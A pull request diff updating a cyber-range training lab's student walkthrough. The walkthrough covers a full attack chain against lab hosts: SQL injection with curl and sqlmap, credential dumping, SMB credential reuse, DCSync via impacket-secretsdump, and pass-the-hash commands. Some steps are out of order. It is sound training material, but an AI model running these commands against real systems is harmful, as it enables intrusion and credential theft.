### PR TITLE
fix: update seed blueprint walkthrough with correct content

### DIFF
--- a/data/seed-blueprints/red-team-training-lab.yaml
+++ b/data/seed-blueprints/red-team-training-lab.yaml
@@ -111,182 +111,626 @@ router:
   enabled: true
   dhcp_enabled: false
 
-# Walkthrough/Student Guide
+# Walkthrough/Student Guide (Content Library format)
+# This matches the walkthrough_data JSON structure used in the Content Library
 walkthrough:
-  title: "Red Team Training Lab - Student Guide"
-  overview: |
-    Welcome to the Red Team Training Lab. You will play the role of a penetration tester
-    who has been hired to assess Acme Widgets' security posture. Your goal is to gain
-    Domain Admin access starting from a position outside the network.
-  objectives:
-    - Network reconnaissance and enumeration
-    - SQL injection attacks and credential extraction
-    - Cross-site scripting (XSS) and browser exploitation with BeEF
-    - Lateral movement using stolen credentials
-    - Active Directory attacks (DCSync)
-    - The importance of defense-in-depth
-  network_diagram: |
-    INTERNET (172.16.0.0/24)
-    +---------------------------+
-    |  kali (172.16.0.10)       |  <-- Your Attack Box
-    |  redir1 (172.16.0.20)     |
-    |  redir2 (172.16.0.21)     |
-    +---------------------------+
-                |
-    ============|============  (Router)
-                |
-    DMZ (172.16.1.0/24)
-    +-----------------------+
-    | webserver (172.16.1.10)|  <-- WordPress Target
-    +-----------------------+
-                |
-    ============|============  (Router)
-                |
-    INTERNAL (172.16.2.0/24)
-    +-----------------------+
-    | dc01 (172.16.2.10)     |  <-- Domain Controller
-    | fileserver (.2.20)     |  <-- SMB File Server
-    | ws01 (172.16.2.30)     |  <-- Employee Workstation
-    +-----------------------+
+  title: "Red Team Training Lab"
+  description: "A comprehensive guide to penetration testing fundamentals covering reconnaissance, SQL injection, lateral movement, and domain compromise."
+  content_type: "student_guide"
+  version: "1.0"
+  tags:
+    - red-team
+    - penetration-testing
+    - training
   phases:
-    - id: recon
-      title: "Phase 1: Reconnaissance"
-      description: "Discover and enumerate the target network"
+    - id: phase1
+      name: "Reconnaissance"
       steps:
-        - id: recon-1
-          title: "Check your position"
+        - id: step1_1
+          vm: kali
+          title: "Understanding Your Position"
           content: |
-            First, understand your position in the network. Open a terminal on Kali.
+            ## Your Mission
+
+            You are a penetration tester hired to assess **Acme Widgets'** security. Your goal: gain Domain Admin access starting from outside the network.
+
+            ### Network Architecture
+
+            ```
+            INTERNET (172.16.0.0/24)
+            ├── kali (172.16.0.10)        ← You are here
+            └── wordpress (172.16.0.100)  ← Your initial target
+
+            DMZ (172.16.1.0/24)
+            └── wordpress (172.16.1.10)   ← Same server, internal IP
+
+            INTERNAL (172.16.2.0/24)
+            ├── fileserver (172.16.2.10)  ← SMB File Server
+            ├── ws01 (172.16.2.11)        ← Employee Workstation
+            └── dc01 (172.16.2.12)        ← Domain Controller
+            ```
+
+            ### First Steps
+
+            Open a terminal and check your IP address:
+
             ```bash
             ip addr show eth0
             ```
-            You should see 172.16.0.10 - you're on the "internet" network.
-        - id: recon-2
+
+            > You should see `172.16.0.10` - you're on the "internet" network.
+
+        - id: step1_2
+          vm: kali
           title: "Network Discovery"
           content: |
-            Scan your network to find live hosts:
+            ## Discover Live Hosts
+
+            Let's find what hosts are reachable from our position.
+
             ```bash
+            # Ping sweep - find live hosts
             nmap -sn 172.16.0.0/24
             ```
-            You should find the webserver at 172.16.0.100.
-        - id: recon-3
+
+            **What `-sn` does:** Host discovery only, no port scan. Fast and stealthy.
+
+            ### Expected Results
+
+            You should find:
+            - `172.16.0.1` - Gateway
+            - `172.16.0.10` - Your Kali box
+            - `172.16.0.100` - **WordPress server** (your target!)
+
+        - id: step1_3
+          vm: kali
           title: "Service Enumeration"
           content: |
-            Scan services on the webserver:
+            ## Enumerate the Target
+
+            Now scan the WordPress server for open ports and services:
+
             ```bash
             nmap -sV -sC 172.16.0.100
             ```
-            Expected: Port 80 (HTTP), Port 3306 (MySQL)
-    - id: sqli
-      title: "Phase 2: SQL Injection"
-      description: "Exploit the web application to extract credentials"
+
+            **Flags explained:**
+            - `-sV` - Detect service versions
+            - `-sC` - Run default NSE scripts
+
+            ### Expected Results
+
+            | Port | Service | Notes |
+            |------|---------|-------|
+            | 22 | SSH | OpenSSH server |
+            | 80 | HTTP | Apache web server |
+
+            > **Next:** Let's explore that web application!
+
+    - id: phase2
+      name: "SQL Injection"
       steps:
-        - id: sqli-1
-          title: "Web Enumeration"
+        - id: step2_1
+          vm: kali
+          title: "Explore the Web App"
           content: |
-            Explore the web application:
+            ## Web Application Reconnaissance
+
+            Open Firefox and browse to the target:
+
+            ```
+            http://172.16.0.100
+            ```
+
+            Or use curl:
+            ```bash
+            curl -s http://172.16.0.100 | head -50
+            ```
+
+            ### What to Look For
+
+            - Technology stack (WordPress, custom app?)
+            - Login forms and search boxes
+            - Links to other pages
+
+            > **Hint:** Look for an **Employee Directory** page!
+
+        - id: step2_2
+          vm: kali
+          title: "Find the Vulnerable Page"
+          content: |
+            ## Directory Discovery
+
+            Let's find hidden pages using gobuster:
+
             ```bash
             gobuster dir -u http://172.16.0.100 -w /usr/share/wordlists/dirb/common.txt
             ```
-            Look for /employee-directory/
-        - id: sqli-2
-          title: "Test for SQLi"
-          content: |
-            Test the search box for SQL injection:
-            ```bash
-            curl "http://172.16.0.100/employee-directory/?search='"
-            ```
-            An error indicates vulnerability.
-        - id: sqli-3
-          title: "Extract Credentials"
-          content: |
-            Use sqlmap to dump the database:
-            ```bash
-            sqlmap -u "http://172.16.0.100/employee-directory/?search=test" -D wordpress -T wp_acme_employees --dump --batch
-            ```
-            You'll find: svc_backup / Backup2024!
-    - id: lateral
-      title: "Phase 3: Lateral Movement"
-      description: "Use stolen credentials to access internal systems"
-      steps:
-        - id: lateral-1
-          title: "Test SMB Access"
-          content: |
-            Test credentials on the file server:
-            ```bash
-            smbclient -L //172.16.2.20 -U svc_backup%Backup2024!
-            ```
-        - id: lateral-2
-          title: "Access Sensitive Files"
-          content: |
-            Connect to the sensitive share:
-            ```bash
-            smbclient //172.16.2.20/sensitive -U svc_backup%Backup2024!
-            ```
-            Download and examine passwords.txt
-    - id: ad-attack
-      title: "Phase 4: Active Directory Attack"
-      description: "Compromise the domain using DCSync"
-      steps:
-        - id: ad-1
-          title: "DCSync Attack"
-          content: |
-            The svc_backup account has DCSync rights (misconfiguration):
-            ```bash
-            impacket-secretsdump 'acmewidgets.local/svc_backup:Backup2024!@172.16.2.10'
-            ```
-            This extracts all domain password hashes.
-        - id: ad-2
-          title: "Pass-the-Hash"
-          content: |
-            Use the Administrator hash to get a shell:
-            ```bash
-            impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:<NTLM_HASH> Administrator@172.16.2.10
-            ```
-            You now have Domain Admin access!
-    - id: post-exploit
-      title: "Phase 5: Post-Exploitation"
-      description: "Verify access and explore the domain"
-      steps:
-        - id: post-1
-          title: "Verify Access"
-          content: |
-            On the DC:
-            ```bash
-            whoami
-            whoami /groups
-            net group "Domain Admins" /domain
-            ```
-  defensive_lessons:
-    - vulnerability: "SQL Injection"
-      impact: "Credential theft"
-      mitigation: "Parameterized queries, input validation, WAF"
-    - vulnerability: "Plaintext passwords"
-      impact: "Direct credential exposure"
-      mitigation: "Hash passwords, use secrets manager"
-    - vulnerability: "Password reuse"
-      impact: "Lateral movement"
-      mitigation: "Unique passwords, password manager"
-    - vulnerability: "DCSync rights for service account"
-      impact: "Domain compromise"
-      mitigation: "Principle of least privilege"
-  quick_reference: |
-    # Network scanning
-    nmap -sn 172.16.1.0/24                    # Host discovery
-    nmap -sV -sC -p- <IP>                     # Full port scan
 
-    # SQL Injection
-    sqlmap -u "<URL>" --dbs                   # List databases
-    sqlmap -u "<URL>" -D <db> --tables        # List tables
-    sqlmap -u "<URL>" -D <db> -T <tbl> --dump # Dump table
+            ### Expected Output
 
-    # SMB
-    smbclient -L //<IP> -U <user>%<pass>      # List shares
-    smbclient //<IP>/<share> -U <user>%<pass> # Connect to share
+            You should see several results including:
 
-    # Active Directory
-    impacket-secretsdump '<domain>/<user>:<pass>@<DC>'    # DCSync
-    impacket-psexec -hashes <LM>:<NTLM> <user>@<IP>       # Pass-the-Hash
+            ```
+            /wp-admin             (Status: 301)
+            /wp-content           (Status: 301)
+            /wp-includes          (Status: 301)
+            /employees            (Status: 301)  ← This looks interesting!
+            ```
+
+            ### Investigate the Finding
+
+            Navigate to the discovered `/employees/` page:
+
+            ```
+            http://172.16.0.100/employees/
+            ```
+
+            ### What Do You See?
+
+            - A table of employees with names, departments, and contact info
+            - A **search box** - user input is always interesting for attackers!
+            - **Clickable employee names** - click on "John Smith" and notice the URL changes
+
+            When you click an employee, the URL becomes:
+            ```
+            http://172.16.0.100/employees/?employee_id=1
+            ```
+
+            This `employee_id` parameter is user-controllable input - a potential injection point!
+
+        - id: step_sqli_intro
+          title: "Understanding SQL Injection"
+          content: |
+            ## What is SQL Injection?
+
+            SQL Injection (SQLi) occurs when user input is inserted directly into a SQL query without proper sanitization. This allows attackers to manipulate the query's logic and access or modify data they shouldn't be able to reach.
+
+            ### How Does It Work?
+
+            Imagine a web application that looks up employee details with code like this:
+
+            ```php
+            // VULNERABLE CODE - Never do this!
+            $query = "SELECT * FROM employees WHERE id = " . $_GET['employee_id'];
+            ```
+
+            When you visit `?employee_id=1`, the query becomes:
+            ```sql
+            SELECT * FROM employees WHERE id = 1
+            ```
+
+            But what if you visit `?employee_id=1 OR 1=1`? The query becomes:
+            ```sql
+            SELECT * FROM employees WHERE id = 1 OR 1=1
+            ```
+
+            Since `1=1` is always true, this returns ALL employees instead of just one!
+
+            ### Why Is This Dangerous?
+
+            With SQL injection, attackers can:
+            - **Read sensitive data** - Extract usernames, passwords, credit cards
+            - **Bypass authentication** - Log in without valid credentials
+            - **Modify data** - Change prices, delete records, add admin accounts
+            - **Execute system commands** - On some databases, run OS commands
+
+            ### Boolean-Based Testing
+
+            The simplest way to test for SQLi is with boolean conditions:
+            - `AND 1=1` - Always TRUE, query should work normally
+            - `AND 1=2` - Always FALSE, query should return nothing
+
+            If the page behaves differently between these two, the input is being executed as SQL!
+
+        - id: step2_3
+          vm: kali
+          title: "Test for SQL Injection"
+          content: |
+            ## Testing for SQL Injection
+
+            The page has two potential injection points:
+            1. The `search` parameter (search box)
+            2. The `employee_id` parameter (employee detail links)
+
+            Click on an employee name to see their details. Notice the URL changes to include `employee_id=1`.
+
+            ### Testing the employee_id Parameter
+
+            This numeric field is easier to exploit. We'll extract the employee's notes field to see the difference:
+
+            ```bash
+            # Normal request - should show employee notes
+            curl -s "http://172.16.0.100/employees/?employee_id=1" | grep -o 'Notes:</strong>[^<]*' | sed 's/Notes:<\/strong> //'
+            ```
+
+            **Expected output:** `IT admin, has server access`
+
+            Now test with boolean SQL injection:
+
+            ```bash
+            # Boolean true (1=1) - should still show notes (spaces URL-encoded as %20)
+            curl -s "http://172.16.0.100/employees/?employee_id=1%20AND%201=1" | grep -o 'Notes:</strong>[^<]*' | sed 's/Notes:<\/strong> //'
+            ```
+
+            **Expected output:** `IT admin, has server access` (same as before)
+
+            ```bash
+            # Boolean false (1=2) - should return NOTHING
+            curl -s "http://172.16.0.100/employees/?employee_id=1%20AND%201=2" | grep -o 'Notes:</strong>[^<]*' | sed 's/Notes:<\/strong> //'
+            ```
+
+            **Expected output:** (empty - no output!)
+
+            > **Different responses confirm SQL injection!** The injected SQL is being executed by the database.
+
+        - id: step2_4
+          vm: kali
+          title: "Extract Data with SQLMap"
+          content: |
+            ## Automated Exploitation
+
+            SQLMap automates SQL injection attacks. Let's use it!
+
+            ### Step 1: Confirm the Vulnerability
+
+            ```bash
+            sqlmap -u "http://172.16.0.100/employees/?employee_id=1" -p employee_id --batch
+            ```
+
+            `-p employee_id` tells SQLMap which parameter to test.
+
+            ### Step 2: List Databases
+
+            ```bash
+            sqlmap -u "http://172.16.0.100/employees/?employee_id=1" -p employee_id --dbs --batch
+            ```
+
+            ### Step 3: List Tables
+
+            ```bash
+            sqlmap -u "http://172.16.0.100/employees/?employee_id=1" -p employee_id -D wordpress --tables --batch
+            ```
+
+            > Look for: `wp_acme_employees`
+
+        - id: step2_5
+          vm: kali
+          title: "Dump the Credentials!"
+          content: |
+            ## Extract Employee Data
+
+            Now dump the employee table:
+
+            ```bash
+            sqlmap -u "http://172.16.0.100/employees/?employee_id=1" \
+              -p employee_id -D wordpress -T wp_acme_employees --dump --batch
+            ```
+
+            ### CRITICAL FINDING
+
+            The output reveals **VPN credentials in plaintext**:
+
+            | Employee | Username | Password |
+            |----------|----------|----------|
+            | John Smith | jsmith | Summer2024 |
+            | Mary Williams | mwilliams | Welcome123 |
+            | **Backup Service** | **svc_backup** | **Backup2024** |
+
+            > **The service account is your ticket to the internal network!**
+
+    - id: phase3
+      name: "Lateral Movement"
+      steps:
+        - id: step3_1
+          vm: kali
+          title: "Test Credential Reuse"
+          content: |
+            ## The Credential Reuse Attack
+
+            Employees and services often reuse passwords across systems. Let's test if `svc_backup` credentials from the WordPress database also work on the internal file server.
+
+            ### Understanding Credential Reuse
+
+            This is one of the most common attack vectors:
+            1. Attacker compromises one system (WordPress database)
+            2. Extracts credentials (svc_backup / Backup2024)
+            3. Tests those credentials on other systems
+            4. Gains access to additional resources
+
+            ### Method 1: Using Impacket (Recommended)
+
+            Impacket is a powerful Python toolkit commonly used in penetration testing:
+
+            ```bash
+            impacket-smbclient 'svc_backup:Backup2024@172.16.2.10'
+            ```
+
+            Once connected, list available shares:
+            ```
+            # shares
+            ```
+
+            ### Method 2: Using Standard smbclient
+
+            Alternatively, use the standard Linux SMB client:
+
+            ```bash
+            # List shares
+            smbclient -L //172.16.2.10 -U 'svc_backup%Backup2024'
+            ```
+
+            ### Expected Shares
+
+            | Share | Description |
+            |-------|-------------|
+            | public | Open to everyone |
+            | **sensitive** | Restricted - but svc_backup has access! |
+            | accounting | Financial documents |
+            | IPC$ | Inter-process communication |
+
+            > **The credentials work!** This confirms password reuse between systems.
+
+        - id: explore-domain
+          vm: kali
+          title: "Explore the Domain"
+          content: |
+            Now that we have domain admin credentials, let's explore the Active Directory structure.
+
+            **List domain users with ldapsearch:**
+
+            ```bash
+            LDAPTLS_REQCERT=never ldapsearch -x -H ldap://172.16.2.12 -ZZ \
+              -D "cn=Administrator,cn=Users,DC=acmewidgets,DC=local" \
+              -w 'Adm1n2024' \
+              -b 'cn=Users,DC=acmewidgets,DC=local' \
+              '(objectClass=user)' sAMAccountName
+            ```
+
+            > **Note:** `LDAPTLS_REQCERT=never` is needed because the domain controller uses a self-signed certificate. The `-ZZ` flag enables StartTLS encryption which Samba AD requires.
+
+            **Alternative: Use rpcclient to enumerate users:**
+
+            ```bash
+            rpcclient -U 'Administrator%Adm1n2024' 172.16.2.12 -c enumdomusers
+            ```
+
+            This shows all domain user accounts including service accounts like `svc_backup` that may have elevated privileges.
+
+        - id: step3_3
+          vm: kali
+          title: "The Domain Admin Password"
+          content: |
+            ## Critical Discovery!
+
+            The `passwords.txt` file reveals emergency credentials:
+
+            ```
+            === ACME INTERNAL PASSWORD LIST ===
+            DO NOT SHARE OUTSIDE IT DEPARTMENT
+
+            Server Room Door: 4521
+            WiFi Password: AcmeGuest2024
+            VPN PSK: AcmeVPN2024
+            Backup Encryption: BackupKey2024!
+
+            Domain Admin (emergency): Adm1n2024
+            ```
+
+            ### What You've Found
+
+            | Account | Password | Access Level |
+            |---------|----------|--------------|
+            | Administrator | Adm1n2024 | **DOMAIN ADMIN** |
+
+            ### Why This Matters
+
+            - **Plaintext passwords** stored on a file share (terrible practice!)
+            - **Domain Admin credentials** give you complete control of the network
+            - This is a common finding in real penetration tests
+
+            > **You now have the keys to the kingdom!**
+
+            Next, we'll verify these credentials work on the Domain Controller.
+
+    - id: phase4
+      name: "Domain Compromise"
+      steps:
+        - id: step4_1
+          vm: kali
+          title: "Understanding DCSync"
+          content: |
+            ## The DCSync Attack
+
+            Remember `svc_backup`? This account has **"Replicating Directory Changes"** permissions - a common misconfiguration for backup service accounts.
+
+            ### What is DCSync?
+
+            DCSync abuses the domain replication protocol. Your computer pretends to be a Domain Controller and requests password hashes from the real DC.
+
+            ### Why This Works
+
+            - Domain Controllers replicate data between each other
+            - Any account with replication rights can request this data
+            - The data includes **all user password hashes**!
+
+        - id: step4_2
+          vm: kali
+          title: "Perform DCSync"
+          content: |
+            ## Extract Domain Hashes
+
+            Use Impacket's secretsdump to perform DCSync:
+
+            ```bash
+            impacket-secretsdump 'acmewidgets.local/svc_backup:Backup2024@172.16.2.12'
+            ```
+
+            ### Note About This Lab
+
+            This lab uses **Samba 4** (not Windows AD), which has limited DCSync support. If you see `rpc_s_access_denied`, don't worry!
+
+            **Alternative:** Use the Domain Admin password you found in `passwords.txt`:
+
+            ```bash
+            impacket-secretsdump 'Administrator:Adm1n2024@172.16.2.12'
+            ```
+
+            ### Understanding the Output
+
+            ```
+            Administrator:500:aad3b435...:NTLM_HASH:::
+            ```
+
+            Format: `username:RID:LM_hash:NTLM_hash:::`
+
+        - id: step4_3
+          vm: kali
+          title: "Verify Domain Admin Access"
+          content: |
+            ## Verifying Domain Admin Access
+
+            ### Note About This Lab
+
+            This lab uses **Samba 4 AD** (Linux-based), not Windows Server. Some tools won't work:
+            - `impacket-psexec` - Requires Windows Service Control Manager
+            - `impacket-wmiexec` - Requires Windows WMI
+
+            ### Verify Access via SMB
+
+            ```bash
+            # List DC shares with Domain Admin
+            smbclient -L //172.16.2.12 -U 'Administrator%Adm1n2024'
+
+            # Access SYSVOL (only Domain Admins can write here)
+            smbclient //172.16.2.12/sysvol -U 'Administrator%Adm1n2024' -c 'ls'
+            ```
+
+            ### In a Real Windows AD
+
+            You would use Pass-the-Hash:
+
+            ```bash
+            impacket-psexec -hashes aad3b435..:<NTLM_HASH> Administrator@<DC_IP>
+            ```
+
+            > **You now have Domain Admin access!**
+
+    - id: phase5
+      name: "Post-Exploitation"
+      steps:
+        - id: step5_1
+          vm: kali
+          title: "Verify Domain Admin Access"
+          content: |
+            ## Confirm Your Access
+
+            Let's verify we have Domain Admin on all systems via SMB.
+
+            ### Domain Controller
+
+            ```bash
+            smbclient //172.16.2.12/sysvol -U 'Administrator%Adm1n2024' -c 'ls'
+            ```
+
+            ### File Server
+
+            ```bash
+            smbclient //172.16.2.10/sensitive -U 'Administrator%Adm1n2024' -c 'ls'
+            ```
+
+            ### Alternative with Impacket
+
+            ```bash
+            impacket-smbclient 'Administrator:Adm1n2024@172.16.2.12'
+            # shares
+            # use sysvol
+            # ls
+            ```
+
+            > **Full access confirmed!**
+
+        - id: step5_2
+          vm: kali
+          title: "Explore the Domain"
+          content: |
+            ## Domain Enumeration
+
+            Since this is Samba AD, we use LDAP or SMB to enumerate.
+
+            ### List Domain Users via LDAP
+
+            ```bash
+            # Note: LDAPTLS_REQCERT=never bypasses the self-signed certificate
+            LDAPTLS_REQCERT=never ldapsearch -x -H ldap://172.16.2.12 -ZZ \
+              -D "cn=Administrator,cn=Users,DC=acmewidgets,DC=local" \
+              -w 'Adm1n2024' \
+              -b 'cn=Users,DC=acmewidgets,DC=local' \
+              '(objectClass=user)' sAMAccountName
+            ```
+
+            ### Check Domain Admin Group Members
+
+            ```bash
+            LDAPTLS_REQCERT=never ldapsearch -x -H ldap://172.16.2.12 -ZZ \
+              -D "cn=Administrator,cn=Users,DC=acmewidgets,DC=local" \
+              -w 'Adm1n2024' \
+              -b 'DC=acmewidgets,DC=local' \
+              '(cn=Domain Admins)' member
+            ```
+
+            ### Alternative: Use rpcclient
+
+            ```bash
+            rpcclient -U 'Administrator%Adm1n2024' 172.16.2.12 -c enumdomusers
+            ```
+
+            This shows all domain user accounts and their RIDs.
+
+        - id: step5_3
+          vm: kali
+          title: "Mission Complete!"
+          content: |
+            ## Attack Chain Summary
+
+            Congratulations! Here's your complete attack path:
+
+            ```
+            1. RECONNAISSANCE
+               └── nmap discovered WordPress at 172.16.0.100
+                   └── Ports 22 (SSH), 80 (HTTP) open
+
+            2. SQL INJECTION
+               └── Employee Directory (/employees/)
+                   └── SQLi in employee_id parameter
+                       └── Extracted credentials:
+                           - svc_backup / Backup2024
+
+            3. LATERAL MOVEMENT
+               └── Credential reuse on file server (172.16.2.10)
+                   └── svc_backup → sensitive share
+                       └── Found passwords.txt
+                           └── Domain Admin: Adm1n2024
+
+            4. DOMAIN COMPROMISE
+               └── SMB access to DC01 SYSVOL
+                   └── Full admin access to:
+                       - dc01 (Domain Controller)
+                       - fileserver
+                       - All domain resources
+            ```
+
+            ## Defensive Lessons
+
+            | Vulnerability | Fix |
+            |--------------|-----|
+            | SQL Injection | Parameterized queries |
+            | Plaintext passwords | Use a secrets manager |
+            | Password reuse | Unique passwords + MFA |
+            | Sensitive files on share | Proper access controls |
+            | Excessive service account rights | Least privilege |
+
+            > **Remember:** Only use these techniques with explicit authorization!
 
 # Training scenario events (MSEL)
 events:


### PR DESCRIPTION
## Summary
- Updated the Red Team Training Lab seed blueprint walkthrough with the correct, complete content from the Content Library
- Matches the walkthrough_data format used for consistency with import/export

## Changes
The walkthrough now includes:
- Detailed reconnaissance steps with expected outputs
- SQL injection theory and practical exploitation
- Lateral movement via credential reuse  
- Domain compromise techniques for Samba AD
- Post-exploitation verification steps
- Attack chain summary and defensive lessons

## Test plan
- [ ] Verify seed blueprint loads correctly
- [ ] Export a range with this walkthrough and verify content matches

🤖 Generated with [Claude Code](https://claude.com/claude-code)